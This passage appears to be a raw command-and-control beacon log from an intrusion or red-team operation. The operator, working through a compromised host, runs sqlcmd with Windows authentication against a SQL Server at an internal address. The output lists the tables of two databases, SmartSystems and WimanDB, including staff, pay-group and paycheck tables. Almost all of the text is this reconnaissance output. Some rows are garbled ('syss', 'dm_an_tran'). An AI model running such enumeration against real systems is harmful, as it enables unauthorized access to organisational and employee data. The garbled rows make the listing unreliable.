TABLE_QUALIFIER TABLE_OWNER TABLE_NAME TABLE_TYPE
--------------- ----------- ---------- ---------- -------
SmartSystems dbo AssetHistory_TBL TABLE NULL
SmartSystems dbo AssetMessageMappings_TBL TABLE NULL
SmartSystems dbo BundleInfo_TBL TABLE NULL
SmartSystems dbo ClientLicenses_TBL TABLE NULL
SmartSystems dbo ComponentsSupportedByDataFiles_TBL TABLE NULL
SmartSystems dbo Customers_TBL TABLE NULL
SmartSystems dbo DatabaseInfo_TBL TABLE NULL
SmartSystems dbo DeviceAliases_TBL TABLE NULL
SmartSystems dbo DeviceDetails_TBL TABLE NULL
SmartSystems dbo Devices_TBL TABLE NULL
SmartSystems dbo Devices2Devices_TBL TABLE NULL
SmartSystems dbo DeviceStatistics_TBL TABLE NULL
SmartSystems dbo DeviceTypes_TBL TABLE NULL
SmartSystems dbo DeviceTypeSpecificTools_TBL TABLE NULL
SmartSystems dbo DeviceTypeXML_TBL TABLE NULL
SmartSystems dbo DragItems_TBL TABLE NULL
SmartSystems dbo DragItems2Groups_TBL TABLE NULL
SmartSystems dbo DragItemStates_TBL TABLE NULL
SmartSystems dbo DragItemTypes_TBL TABLE NULL
SmartSystems dbo EmailNotificationLog_TBL TABLE NULL
SmartSystems dbo EmailNotifications_TBL TABLE NULL
SmartSystems dbo ErrorLog_TBL TABLE NULL
SmartSystems dbo ExportedLicenses_TBL TABLE NULL
SmartSystems dbo Family_TBL TABLE NULL
SmartSystems dbo GlobalSettings_TBL TABLE NULL
SmartSystems dbo Groups_TBL TABLE NULL
SmartSystems dbo Groups2Devices_TBL TABLE NULL
SmartSystems dbo GroupTypes_TBL TABLE NULL
SmartSystems dbo Icons_TBL TABLE NULL
SmartSystems dbo LicenseFeatureStatistics_TBL TABLE NULL
SmartSystems dbo LicenseLookup_TBL TABLE NULL
SmartSystems dbo Licenses_TBL TABLE NULL
SmartSystems dbo MacroVisionLicenses_TBL TABLE NULL
SmartSystems dbo Models_TBL TABLE NULL
SmartSystems dbo RTWStates_TBL TABLE NULL
SmartSystems dbo Servers_TBL TABLE NULL
SmartSystems dbo SupportedUserDefinedTools_TBL TABLE NULL
SmartSystems dbo TFMxRef_TBL TABLE NULL
SmartSystems dbo Trends_TBL TABLE NULL
SmartSystems dbo UserLevels_TBL TABLE NULL
SmartSystems dbo Users_TBL TABLE NULL
SmartSystems dbo AssetHistory VIEW NULL
SmartSystems dbo AssetMessageMappings VIEW NULL
SmartSystems dbo AttachedDevices VIEW NULL
SmartSystems dbo Batteries VIEW NULL
SmartSystems dbo BundleInfo VIEW NULL
SmartSystems dbo BundleTFMs VIEW NULL
SmartSystems dbo ComponentsSupportedByDataFiles VIEW NULL
SmartSystems dbo ComputerHealth VIEW NULL
SmartSystems dbo DBSize VIEW NULL
SmartSystems dbo DeviceAliases VIEW NULL
SmartSystems dbo DeviceDetails VIEW NULL
SmartSystems dbo DeviceLicenses VIEW NULL
SmartSystems dbo Devices VIEW NULL
SmartSystems dbo DeviceStatistics VIEW NULL
SmartSystems dbo DeviceTypeSpecificTools VIEW NULL
SmartSystems dbo DragItems VIEW NULL
SmartSystems dbo DragItems2Groups VIEW NULL
SmartSystems dbo DragItemStates VIEW NULL
SmartSystems dbo DragItemTypes VIEW NULL
SmartSystems dbo ErrorLog VIEW NULL
SmartSystems dbo ExportedLicenses VIEW NULL
SmartSystems dbo FeatureUsage VIEW NULL
SmartSystems dbo Groups VIEW NULL
SmartSystems dbo GUI_DeviceDetails VIEW NULL
SmartSystems dbo Icons VIEW NULL
SmartSystems dbo LicenseCounts VIEW NULL
SmartSystems dbo LicenseFeatureStatistics VIEW NULL
SmartSystems dbo Licenses VIEW NULL
SmartSystems dbo MacroVisionLicenses VIEW NULL
SmartSystems dbo ProvisioningTFMs VIEW NULL
SmartSystems dbo RTWStates VIEW NULL
SmartSystems dbo SupportedUserDefinedTools VIEW NULL
SmartSystems dbo TypeFamilyModel VIEW NULL
SmartSystems dbo UserLevels VIEW NULL
SmartSystems dbo Users VIEW NULL
SmartSystems INFORMATION_SCHEMA CHECK_CONSTRAINTS VIEW NULL
SmartSystems INFORMATION_SCHEMA COLUMN_DOMAIN_USAGE VIEW NULL
SmartSystems INFORMATION_SCHEMA COLUMN_PRIVILEGES VIEW NULL
SmartSystems INFORMATION_SCHEMA COLUMNS VIEW NULL
SmartSystems INFORMATION_SCHEMA CONSTRAINT_COLUMN_USAGE VIEW NULL
SmartSystems INFORMATION_SCHEMA CONSTRAINT_TABLE_USAGE VIEW NULL
SmartSystems INFORMATION_SCHEMA DOMAIN_CONSTRAINTS VIEW NULL
SmartSystems INFORMATION_SCHEMA DOMAINS VIEW NULL
SmartSystems INFORMATION_SCHEMA KEY_COLUMN_USAGE VIEW NULL
SmartSystems INFORMATION_SCHEMA PARAMETERS VIEW NULL
SmartSystems INFORMATION_SCHEMA REFERENTIAL_CONSTRAINTS VIEW NULL
SmartSystems INFORMATION_SCHEMA ROUTINE_COLUMNS VIEW NULL
SmartSystems INFORMATION_SCHEMA ROUTINES VIEW NULL
SmartSystems INFORMATION_SCHEMA SCHEMATA VIEW NULL
SmartSystems INFORMATION_SCHEMA TABLE_CONSTRAINTS VIEW NULL
SmartSystems INFORMATION_SCHEMA TABLE_PRIVILEGES VIEW NULL
SmartSystems INFORMATION_SCHEMA TABLES VIEW NULL
SmartSystems INFORMATION_SCHEMA VIEW_COLUMN_USAGE VIEW NULL
SmartSystems INFORMATION_SCHEMA VIEW_TABLE_USAGE VIEW NULL
SmartSystems INFORMATION_SCHEMA VIEWS VIEW NULL
SmartSystems sys all_columns VIEW NULL
SmartSystems sys all_objects VIEW NULL
SmartSystems sys all_parameters VIEW NULL
SmartSystems sys all_sql_modules VIEW NULL
SmartSystems sys all_views VIEW NULL
SmartSystems sys allocation_units VIEW NULL
SmartSystems sys assemblies VIEW NULL
SmartSystems sys assembly_files VIEW NULL
SmartSystems sys assembly_modules VIEW NULL
SmartSystems sys assembly_references VIEW NULL
SmartSystems sys assembly_types VIEW NULL
SmartSystems sys asymmetric_keys VIEW NULL
SmartSystems sys backup_devices VIEW NULL
SmartSystems sys certificates VIEW NULL
SmartSystems sys change_tracking_databases VIEW NULL
SmartSystems sys change_tracking_tables VIEW NULL
SmartSystems sys check_constraints VIEW NULL
SmartSystems sys column_type_usages VIEW NULL
SmartSystems sys column_xml_schema_collection_usages VIEW NULL
SmartSystems sys columns VIEW NULL
SmartSystems sys computed_columns VIEW NULL
SmartSystems sys configurations VIEW NULL
SmartSystems sys conversation_endpoints VIEW NULL
SmartSystems sys conversation_groups VIEW NULL
SmartSystems sys conversation_priorities VIEW NULL
SmartSystems sys credentials VIEW NULL
SmartSystems sys crypt_properties VIEW NULL
SmartSystems sys cryptographic_providers VIEW NULL
SmartSystems sys data_spaces VIEW NULL
SmartSystems sys database_audit_specification_details VIEW NULL
SmartSystems sys database_audit_specifications VIEW NULL
SmartSystems sys database_files VIEW NULL
SmartSystems sys database_mirroring VIEW NULL
SmartSystems sys database_mirroring_endpoints VIEW NULL
SmartSystems sys database_mirroring_witnesses VIEW NULL
SmartSystems sys database_permissions VIEW NULL
SmartSystems sys database_principal_aliases VIEW NULL
SmartSystems sys database_principal_aliases VIEW NULL
SmartSystems sys database_recovery_status VIEW NULL
SmartSystems sys database_role_members VIEW NULL
SmartSystems sys databases VIEW NULL
SmartSystems sys default_constraints VIEW NULL
SmartSystems sys destination_data_spaces VIEW NULL
SmartSystems sys dm_audit_actions VIEW NULL
SmartSystems sys dm_audit_class_type_map VIEW NULL
SmartSystems sys dm_broker_activated_tasks VIEW NULL
SmartSystems sys dm_broker_connections VIEW NULL
SmartSystems sys dm_broker_forwarded_messages VIEW NULL
SmartSystems sys dm_broker_queue_monitors VIEW NULL
SmartSystems sys dm_cdc_errors VIEW NULL
SmartSystems sys dm_cdc_log_scan_sessions VIEW NULL
SmartSystems sys dm_clr_appdomains VIEW NULL
SmartSystems sys dm_clr_loaded_assemblies VIEW NULL
SmartSystems sys dm_clr_properties VIEW NULL
SmartSystems sys dm_clr_tasks VIEW NULL
SmartSystems sys dm_cryptographic_provider_properties VIEW NULL
SmartSystems sys dm_database_encryption_keys VIEW NULL
SmartSystems sys dm_db_file_space_usage VIEW NULL
SmartSystems sys dm_db_index_usage_stats VIEW NULL
SmartSystems sys dm_db_mirroring_auto_page_repair VIEW NULL
SmartSystems sys dm_db_mirroring_connections VIEW NULL
SmartSystems sys dm_db_mirroring_past_actions VIEW NULL
SmartSystems sys dm_db_missing_index_details VIEW NULL
SmartSystems sys dm_db_missing_index_group_stats VIEW NULL
SmartSystems sys dm_db_missing_index_groups VIEW NULL
SmartSystems sys dm_db_partition_stats VIEW NULL
SmartSystems sys dm_db_persisted_sku_features VIEW NULL
SmartSystems sys dm_db_script_level VIEW NULL
SmartSystems sys dm_db_session_space_usage VIEW NULL
SmartSystems sys dm_db_task_space_usage VIEW NULL
SmartSystems sys dm_exec_background_job_queue VIEW NULL
SmartSystems sys dm_exec_background_job_queue_stats VIEW NULL
SmartSystems sys dm_exec_cached_plans VIEW NULL
SmartSystems sys dm_exec_connections VIEW NULL
SmartSystems sys dm_exec_procedure_stats VIEW NULL
SmartSystems sys dm_exec_query_memory_grants VIEW NULL
SmartSystems sys dm_exec_query_optimizer_info VIEW NULL
SmartSystems sys dm_exec_query_resource_semaphores VIEW NULL
SmartSystems sys dm_exec_query_stats VIEW NULL
SmartSystems sys dm_exec_query_transformation_stats VIEW NULL
SmartSystems sys dm_exec_requests VIEW NULL
SmartSystems sys dm_exec_sessions VIEW NULL
SmartSystems sys dm_exec_trigger_stats VIEW NULL
SmartSystems sys dm_filestream_file_io_handles VIEW NULL
SmartSystems sys dm_filestream_file_io_requests VIEW NULL
SmartSystems sys dm_fts_active_catalogs VIEW NULL
SmartSystems sys dm_fts_fdhosts VIEW NULL
SmartSystems sys dm_fts_index_population VIEW NULL
SmartSystems sys dm_fts_memory_buffers VIEW NULL
SmartSystems sys dm_fts_memory_pools VIEW NULL
SmartSystems sys dm_fts_outstanding_batches VIEW NULL
SmartSystems sys dm_fts_population_ranges VIEW NULL
SmartSystems sys dm_io_backup_tapes VIEW NULL
SmartSystems sys dm_io_cluster_shared_drives VIEW NULL
SmartSystems sys dm_io_pending_io_requests VIEW NULL
SmartSystems sys dm_os_buffer_descriptors VIEW NULL
SmartSystems sys dm_os_child_instances VIEW NULL
SmartSystems sys dm_os_cluster_nodes VIEW NULL
SmartSystems sys dm_os_dispatcher_pools VIEW NULL
SmartSystems sys dm_os_dispatchers VIEW NULL
SmartSystems sys dm_os_hosts VIEW NULL
SmartSystems sys dm_os_latch_stats VIEW NULL
SmartSystems sys dm_os_loaded_modules VIEW NULL
SmartSystems sys dm_os_memory_allocations VIEW NULL
SmartSystems sys dm_os_memory_brokers VIEW NULL
SmartSystems sys dm_os_memory_cache_clock_hands VIEW NULL
SmartSystems sys dm_os_memory_cache_counters VIEW NULL
SmartSystems sys dm_os_memory_cache_entries VIEW NULL
SmartSystems sys dm_os_memory_cache_hash_tables VIEW NULL
SmartSystems sys dm_os_memory_clerks VIEW NULL
SmartSystems sys dm_os_memory_node_access_stats VIEW NULL
SmartSystems sys dm_os_memory_nodes VIEW NULL
SmartSystems sys dm_os_memory_objects VIEW NULL
SmartSystems sys dm_os_memory_pools VIEW NULL
SmartSystems sys dm_os_nodes VIEW NULL
SmartSystems sys dm_os_performance_counters VIEW NULL
SmartSystems sys dm_os_process_memory VIEW NULL
SmartSystems sys dm_os_ring_buffers VIEW NULL
SmartSystems sys dm_os_schedulers VIEW NULL
SmartSystems sys dm_os_spinlock_stats VIEW NULL
SmartSystems sys dm_os_stacks VIEW NULL
SmartSystems sys dm_os_sublatches VIEW NULL
SmartSystems sys dm_os_sys_info VIEW NULL
SmartSystems sys dm_os_sys_memory VIEW NULL
SmartSystems sys dm_os_tasks VIEW NULL
SmartSystems sys dm_os_threads VIEW NULL
SmartSystems sys dm_os_virtual_address_dump VIEW NULL
SmartSystems sys dm_os_wait_stats VIEW NULL
SmartSystems sys dm_os_waiting_tasks VIEW NULL
SmartSystems sys dm_os_windows_info VIEW NULL
SmartSystems sys dm_os_worker_local_storage VIEW NULL
SmartSystems sys dm_os_workers VIEW NULL
SmartSystems sys dm_qn_subscriptions VIEW NULL
SmartSystems sys dm_repl_articles VIEW NULL
SmartSystems sys dm_repl_schemas VIEW NULL
SmartSystems sys dm_repl_tranhash VIEW NULL
SmartSystems sys dm_repl_traninfo VIEW NULL
SmartSystems sys dm_resource_governor_configuration VIEW NULL
SmartSystems sys dm_resource_governor_resource_pools VIEW NULL
SmartSystems sys dm_resource_governor_workload_groups VIEW NULL
SmartSystems sys dm_server_audit_status VIEW NULL
SmartSystems sys dm_server_memory_dumps VIEW NULL
SmartSystems sys dm_server_registry VIEW NULL
SmartSystems sys dm_server_services VIEW NULL
SmartSystems sys dm_tran_active_snapshot_database_transactions VIEW NULL
SmartSystems sys dm_tran_active_transactions VIEW NULL
SmartSystems sys dm_tran_commit_table VIEW NULL
SmartSystems sys dm_tran_current_snapshot VIEW NULL
SmartSystems sys dm_an_tran_current_transaction VIEW NULL
SmartSystems sys dm_tran_database_transactions VIEW NULL
SmartSystems sys dm_tran_locks VIEW NULL
SmartSystems sys dm_an_tran_session_transactions VIEW NULL
SmartSystems sys dm_tran_top_version_generators VIEW NULL
SmartSystems sys dm_tran_transactions_snapshot VIEW NULL
SmartSystems sys dm_tran_version_store VIEW NULL
SmartSystems sys dm_xe_map_values VIEW NULL
SmartSystems sys dm_xe_object_columns VIEW NULL
SmartSystems sys dm_xe_objects VIEW NULL
SmartSystems sys dm_xe_packages VIEW NULL
SmartSystems sys dm_xe_session_event_actions VIEW NULL
SmartSystems sys dm_xe_session_events VIEW NULL
SmartSystems sys dm_xe_session_object_columns VIEW NULL
SmartSystems sys dm_xe_session_targets VIEW NULL
SmartSystems sys dm_xe_sessions VIEW NULL
SmartSystems sys endpoint_webmethods VIEW NULL
SmartSystems sys endpoints VIEW NULL
SmartSystems sys event_notification_event_types VIEW NULL
SmartSystems sys event_notifications VIEW NULL
SmartSystems sys events VIEW NULL
SmartSystems sys extended_procedures VIEW NULL
SmartSystems sys extended_properties VIEW NULL
SmartSystems sys filegroups VIEW NULL
SmartSystems sys foreign_key_columns VIEW NULL
SmartSystems sys foreign_keys VIEW NULL
SmartSystems sys fulltext_catalogs VIEW NULL
SmartSystems sys fulltext_document_types VIEW NULL
SmartSystems sys fulltext_index_catalog_usages VIEW NULL
SmartSystems sys fulltext_index_columns VIEW NULL
SmartSystems sys fulltext_index_fragments VIEW NULL
SmartSystems sys fulltext_index_indexes VIEW NULL
SmartSystems sys fulltext_languages VIEW NULL
SmartSystems sys fulltext_stoplists VIEW NULL
SmartSystems sys fulltext_stopwords VIEW NULL
SmartSystems sys fulltext_system_stopwords VIEW NULL
SmartSystems sys function_order_columns VIEW NULL
SmartSystems sys http_endpoints VIEW NULL
SmartSystems sys identity_columns VIEW NULL
SmartSystems sys index_columns VIEW NULL
SmartSystems sys indexes VIEW NULL
SmartSystems sys internal_tables VIEW NULL
SmartSystems sys key_constraints VIEW NULL
SmartSystems sys key_encryptions VIEW NULL
SmartSystems sys linked_logins VIEW NULL
SmartSystems sys login_token VIEW NULL
SmartSystems sys master_files VIEW NULL
SmartSystems sys master_key_passwords VIEW NULL
SmartSystems sys message_type_xml_schema_collection_usages VIEW NULL
SmartSystems sys messages VIEW NULL
SmartSystems sys module_assembly_usages VIEW NULL
SmartSystems sys numbered_procedure_parameters VIEW NULL
SmartSystems sys numbered_procedures VIEW NULL
SmartSystems sys objects VIEW NULL
SmartSystems sys openkeys VIEW NULL
SmartSystems sys parameter_type_usages VIEW NULL
SmartSystems sys parameter_xml_schema_collection_usages VIEW NULL
SmartSystems sys parameters VIEW NULL
SmartSystems sys partition_functions VIEW NULL
SmartSystems sys partition_parameters VIEW NULL
SmartSystems sys partition_range_values VIEW NULL
SmartSystems sys partition_schemes VIEW NULL
SmartSystems sys partitions VIEW NULL
SmartSystems sys plan_guides VIEW NULL
SmartSystems sys procedures VIEW NULL
SmartSystems sys remote_logins VIEW NULL
SmartSystems sys remote_service_bindings VIEW NULL
SmartSystems sys resource_governor_configuration VIEW NULL
SmartSystems sys resource_governor_resource_pools VIEW NULL
SmartSystems sys resource_governor_workload_groups VIEW NULL
SmartSystems sys routes VIEW NULL
SmartSystems sys schemas VIEW NULL
SmartSystems sys securable_classes VIEW NULL
SmartSystems sys server_assembly_modules VIEW NULL
SmartSystems sys server_audit_specification_details VIEW NULL
SmartSystems sys server_audit_specifications VIEW NULL
SmartSystems sys server_audits VIEW NULL
SmartSystems sys server_event_notifications VIEW NULL
SmartSystems sys server_event_session_actions VIEW NULL
SmartSystems sys server_event_session_events VIEW NULL
SmartSystems sys server_event_session_fields VIEW NULL
SmartSystems sys server_event_session_targets VIEW NULL
SmartSystems sys server_event_sessions VIEW NULL
SmartSystems sys server_events VIEW NULL
SmartSystems sys server_file_audits VIEW NULL
SmartSystems sys server_permissions VIEW NULL
SmartSystems sys server_principal_credentials VIEW NULL
SmartSystems sys server_principals VIEW NULL
SmartSystems sys server_role_members VIEW NULL
SmartSystems sys server_sql_modules VIEW NULL
SmartSystems sys server_trigger_events VIEW NULL
SmartSystems sys server_triggers VIEW NULL
SmartSystems sys servers VIEW NULL
SmartSystems sys service_broker_endpoints VIEW NULL
SmartSystems sys service_contract_message_usages VIEW NULL
SmartSystems sys service_contract_usages VIEW NULL
SmartSystems sys service_contracts VIEW NULL
SmartSystems sys service_message_types VIEW NULL
SmartSystems sys service_queue_usages VIEW NULL
SmartSystems sys service_queues VIEW NULL
SmartSystems sys services VIEW NULL
SmartSystems sys soap_endpoints VIEW NULL
SmartSystems sys spatial_index_tessellations VIEW NULL
SmartSystems sys spatial_indexes VIEW NULL
SmartSystems sys spatial_reference_systems VIEW NULL
SmartSystems sys sql_dependencies VIEW NULL
SmartSystems sys sql_expression_dependencies VIEW NULL
SmartSystems sys sql_logins VIEW NULL
SmartSystems sys sql_modules VIEW NULL
SmartSystems sys stats VIEW NULL
SmartSystems sys stats_columns VIEW NULL
SmartSystems sys symmetric_keys VIEW NULL
SmartSystems sys synonyms VIEW NULL
SmartSystems sys sysaltfiles VIEW NULL
SmartSystems sys syscacheobjects VIEW NULL
SmartSystems sys syscharsets VIEW NULL
SmartSystems sys syscolumns VIEW NULL
SmartSystems sys syscomments VIEW NULL
SmartSystems sysconfigures VIEW NULL
SmartSystems sysconstraints VIEW NULL
SmartSystems sys syscurconfigs VIEW NULL
SmartSystems sys syscursorcolumns VIEW NULL
SmartSystems sys syscursorrefs VIEW NULL
SmartSystems sys syscursors VIEW NULL
SmartSystems sys syscursortables VIEW NULL
SmartSystems sys sysdatabases VIEW NULL
SmartSystems sysdepends VIEW NULL
SmartSystems sys sysdevices VIEW NULL
SmartSystems sys sysfilegroups VIEW NULL
SmartSystems sys sysfiles VIEW NULL
SmartSystems sys sysforeignkeys VIEW NULL
SmartSystems sys sysfulltextcatalogs VIEW NULL
SmartSystems sys sysindexes VIEW NULL
SmartSystems sys sysindexkeys VIEW NULL
SmartSystems sys syslanguages VIEW NULL
SmartSystems sys syslockinfo VIEW NULL
SmartSystems sys syslogins VIEW NULL
SmartSystems sys sysmembers VIEW NULL
SmartSystems sys sysmessages VIEW NULL
SmartSystems sys sysobjects VIEW NULL
SmartSystems sys sysoledbusers VIEW NULL
SmartSystems sys sysopentapes VIEW NULL
SmartSystems sys sysperfinfo VIEW NULL
SmartSystems sys syspermissions VIEW NULL
SmartSystems sys sysprocesses VIEW NULL
SmartSystems sys sysprotects VIEW NULL
SmartSystems sys sysreferences VIEW NULL
SmartSystems sys sysremotelogins VIEW NULL
SmartSystems syss sysservers VIEW NULL
SmartSystems sys system_columns VIEW NULL
SmartSystems sys system_components_surface_area_configuration VIEW NULL
SmartSystems sys system_internals_allocation_units VIEW NULL
SmartSystems sys system_internals_partition_columns VIEW NULL
SmartSystems sys system_internals_partitions VIEW NULL
SmartSystems sys system_objects VIEW NULL
SmartSystems sys system_parameters VIEW NULL
SmartSystems sys system_sql_modules VIEW NULL
SmartSystems sys system_views VIEW NULL
SmartSystems sys systypes VIEW NULL
SmartSystems sys sysusers VIEW NULL
SmartSystems sys table_types VIEW NULL
SmartSystems sys tables VIEW NULL
SmartSystems sys tcp_endpoints VIEW NULL
SmartSystems sys trace_categories VIEW NULL
SmartSystems sys trace_columns VIEW NULL
SmartSystems sys trace_event_bindings VIEW NULL
SmartSystems sys trace_events VIEW NULL
SmartSystems sys trace_subclass_values VIEW NULL
SmartSystems sys traces VIEW NULL
SmartSystems sys transmission_queue VIEW NULL
SmartSystems sys trigger_event_types VIEW NULL
SmartSystems sys trigger_events VIEW NULL
SmartSystems sys triggers VIEW NULL
SmartSystems sys type_assembly_usages VIEW NULL
SmartSystems sys types VIEW NULL
SmartSystems sys user_token VIEW NULL
SmartSystems sys via_endpoints VIEW NULL
SmartSystems sys views VIEW NULL
SmartSystems sys xml_indexes VIEW NULL
SmartSystems sys xml_schema_attributes VIEW NULL
SmartSystems sys xml_schema_collections VIEW NULL
SmartSystems sys xml_schema_component_placements VIEW NULL
SmartSystems sys xml_schema_components VIEW NULL
SmartSystems sys xml_schema_elements VIEW NULL
SmartSystems sys xml_schema_facets VIEW NULL
SmartSystems sys xml_schema_model_groups VIEW NULL
SmartSystems sys xml_schema_namespaces VIEW NULL
SmartSystems sys xml_schema_types VIEW NULL
SmartSystems sys xml_schema_wildcard_namespaces VIEW NULL
SmartSystems sys xml_schema_wildcards VIEW NULL

(434 rows affected)
```
 
```
beacon> shell sqlcmd -S 89.0.0.121,1433 -E -Q "use WimanDB; exec sp_tables" -W
[*] Tasked beacon to run: sqlcmd -S 89.0.0.121,1433 -E -Q "use WimanDB; exec sp_tables" -W
[+] host called home, sent: 95 bytes
[+] received output:
Changed database context to 'WimanDB'.
TABLE_QUALIFIER TABLE_OWNER TABLE_NAME TABLE_TYPE
--------------- ----------- ---------- ---------- -------
WimanDB dbo tIncPayGroup TABLE NULL
WimanDB dbo tJobAssignmentLog TABLE NULL
WimanDB dbo tPrabsReason TABLE NULL
WimanDB dbo tPRClockTime TABLE NULL
WimanDB dbo tPRGroup TABLE NULL
WimanDB dbo tPRLogInMethod TABLE NULL
WimanDB dbo tProdXPackInfoChanges TABLE NULL
WimanDB dbo tPRPayGrade TABLE NULL
WimanDB dbo tPRTempServices TABLE NULL
WimanDB dbo tPRTitle TABLE NULL
WimanDB dbo tSampleRequests TABLE NULL
WimanDB dbo tShift TABLE NULL
WimanDB dbo tSite TABLE NULL
WimanDB dbo tStaff TABLE NULL
WimanDB dbo tUserGroup TABLE NULL
WimanDB dbo tWODetxItemSpecific TABLE NULL
WimanDB dbo vAbsRecords VIEW NULL
WimanDB dbo vPRLastJobAssignment VIEW NULL
WimanDB dbo vPRLoggedIn VIEW NULL
WimanDB dbo vProdChangesListToAck VIEW NULL
WimanDB dbo vProdchangesPendingEAck VIEW NULL
WimanDB dbo vProdChangesPendingPAck VIEW NULL
WimanDB dbo vProdChangesPendingQAck VIEW NULL
WimanDB dbo vPRPayChecksPending VIEW NULL
WimanDB dbo vQtyUsedFromBatchForProduction VIEW NULL
WimanDB INFORMATION_SCHEMA CHECK_CONSTRAINTS VIEW NULL
WimanDB INFORMATION_SCHEMA COLUMN_DOMAIN_USAGE VIEW NULL
WimanDB INFORMATION_SCHEMA COLUMN_PRIVILEGES VIEW NULL
WimanDB INFORMATION_SCHEMA COLUMNS VIEW NULL
WimanDB INFORMATION_SCHEMA CONSTRAINT_COLUMN_USAGE VIEW NULL
WimanDB INFORMATION_SCHEMA CONSTRAINT_TABLE_USAGE VIEW NULL
WimanDB INFORMATION_SCHEMA DOMAIN_CONSTRAINTS VIEW NULL
WimanDB INFORMATION_SCHEMA DOMAINS VIEW NULL
WimanDB INFORMATION_SCHEMA KEY_COLUMN_USAGE VIEW NULL
WimanDB INFORMATION_SCHEMA PARAMETERS VIEW NULL
WimanDB INFORMATION_SCHEMA REFERENTIAL_CONSTRAINTS VIEW NULL
WimanDB INFORMATION_SCHEMA ROUTINE_COLUMNS VIEW NULL
WimanDB INFORMATION_SCHEMA ROUTINES VIEW NULL
WimanDB INFORMATION_SCHEMA SCHEMATA VIEW NULL
WimanDB INFORMATION_SCHEMA TABLE_CONSTRAINTS VIEW NULL
WimanDB INFORMATION_SCHEMA TABLE_PRIVILEGES VIEW NULL
WimanDB INFORMATION_SCHEMA TABLES VIEW NULL
WimanDB INFORMATION_SCHEMA VIEW_COLUMN_USAGE VIEW NULL
WimanDB INFORMATION_SCHEMA VIEW_TABLE_USAGE VIEW NULL
WimanDB INFORMATION_SCHEMA VIEWS VIEW NULL
WimanDB sys all_columns VIEW NULL
WimanDB sys all_objects VIEW NULL
WimanDB sys all_parameters VIEW NULL
WimanDB sys all_sql_modules VIEW NULL
WimanDB sys all_views VIEW NULL
WimanDB sys allocation_units VIEW NULL
WimanDB sys assemblies VIEW NULL
WimanDB sys assembly_files VIEW NULL
WimanDB sys assembly_modules VIEW NULL
WimanDB sys assembly_references VIEW NULL
WimanDB sys assembly_types VIEW NULL
WimanDB sys asymmetric_keys VIEW NULL
WimanDB sys backup_devices VIEW NULL
WimanDB sys certificates VIEW NULL
WimanDB sys change_tracking_databases VIEW NULL
WimanDB sys change_tracking_tables VIEW NULL
WimanDB sys check_constraints VIEW NULL
WimanDB sys column_type_usages VIEW NULL
WimanDB sys column_xml_schema_collection_usages VIEW NULL
WimanDB sys columns VIEW NULL
WimanDB sys computed_columns VIEW NULL
WimanDB sys configurations VIEW NULL
WimanDB sys conversation_endpoints VIEW NULL
WimanDB sys conversation_groups VIEW NULL
WimanDB sys conversation_priorities VIEW NULL
WimanDB sys credentials VIEW NULL
WimanDB sys crypt_properties VIEW NULL
WimanDB sys cryptographic_providers VIEW NULL
WimanDB sys data_spaces VIEW NULL
WimanDB sys database_audit_specification_details VIEW NULL
WimanDB sys database_audit_specifications VIEW NULL
WimanDB sys database_files VIEW NULL
WimanDB sys database_mirroring VIEW NULL
WimanDB sys database_mirroring_endpoints VIEW NULL
WimanDB sys database_mirroring_witnesses VIEW NULL
WimanDB sys database_permissions VIEW NULL
WimanDB sys database_principal_aliases VIEW NULL
WimanDB sys database_principal_aliases VIEW NULL
WimanDB sys database_recovery_status VIEW NULL
WimanDB sys database_role_members VIEW NULL
WimanDB sys databases VIEW NULL
WimanDB sys default_constraints VIEW NULL
WimanDB sys destination_data_spaces VIEW NULL
WimanDB sys dm_audit_actions VIEW NULL
WimanDB sys dm_audit_class_type_map VIEW NULL
WimanDB sys dm_broker_activated_tasks VIEW NULL
WimanDB sys dm_broker_connections VIEW NULL
WimanDB sys dm_broker_forwarded_messages VIEW NULL
WimanDB sys dm_broker_queue_monitors VIEW NULL
WimanDB sys dm_cdc_errors VIEW NULL
WimanDB sys dm_cdc_log_scan_sessions VIEW NULL
WimanDB sys dm_clr_appdomains VIEW NULL
WimanDB sys dm_clr_loaded_assemblies VIEW NULL
WimanDB sys dm_clr_properties VIEW NULL
WimanDB sys dm_clr_tasks VIEW NULL
WimanDB sys dm_cryptographic_provider_properties VIEW NULL
WimanDB sys dm_database_encryption_keys VIEW NULL
WimanDB sys dm_db_file_space_usage VIEW NULL
WimanDB sys dm_db_index_usage_stats VIEW NULL
WimanDB sys dm_db_mirroring_auto_page_repair VIEW NULL
WimanDB sys dm_db_mirroring_connections VIEW NULL
WimanDB sys dm_db_mirroring_past_actions VIEW NULL
WimanDB sys dm_db_missing_index_details VIEW NULL
WimanDB sys dm_db_missing_index_group_stats VIEW NULL
WimanDB sys dm_db_missing_index_groups VIEW NULL
WimanDB sys dm_db_partition_stats VIEW NULL
WimanDB sys dm_db_persisted_sku_features VIEW NULL
WimanDB sys dm_db_script_level VIEW NULL
WimanDB sys dm_db_session_space_usage VIEW NULL
WimanDB sys dm_db_task_space_usage VIEW NULL
WimanDB sys dm_exec_background_job_queue VIEW NULL
WimanDB sys dm_exec_background_job_queue_stats VIEW NULL
WimanDB sys dm_exec_cached_plans VIEW NULL
WimanDB sys dm_exec_connections VIEW NULL
WimanDB sys dm_exec_procedure_stats VIEW NULL
WimanDB sys dm_exec_query_memory_grants VIEW NULL
WimanDB sys dm_exec_query_optimizer_info VIEW NULL
WimanDB sys dm_exec_query_resource_semaphores VIEW NULL
WimanDB sys dm_exec_query_stats VIEW NULL
WimanDB sys dm_exec_query_transformation_stats VIEW NULL
WimanDB sys dm_exec_requests VIEW NULL
WimanDB sys dm_exec_sessions VIEW NULL
WimanDB sys dm_exec_trigger_stats VIEW NULL
WimanDB sys dm_filestream_file_io_handles VIEW NULL
WimanDB sys dm_filestream_file_io_requests VIEW NULL
WimanDB sys dm_fts_active_catalogs VIEW NULL
WimanDB sys dm_fts_fdhosts VIEW NULL
WimanDB sys dm_fts_index_population VIEW NULL
WimanDB sys dm_fts_memory_buffers VIEW NULL
WimanDB sys dm_fts_memory_pools VIEW NULL
WimanDB sys dm_fts_outstanding_batches VIEW NULL
WimanDB sys dm_fts_population_ranges VIEW NULL
WimanDB sys dm_io_backup_tapes VIEW NULL
WimanDB sys dm_io_cluster_shared_drives VIEW NULL
WimanDB sys dm_io_pending_io_requests VIEW NULL
WimanDB sys dm_os_buffer_descriptors VIEW NULL
WimanDB sys dm_os_child_instances VIEW NULL
WimanDB sys dm_os_cluster_nodes VIEW NULL
WimanDB sys dm_os_dispatcher_pools VIEW NULL
WimanDB sys dm_os_dispatchers VIEW NULL
WimanDB sys dm_os_hosts VIEW NULL
WimanDB sys dm_os_latch_stats VIEW NULL
WimanDB sys dm_os_loaded_modules VIEW NULL
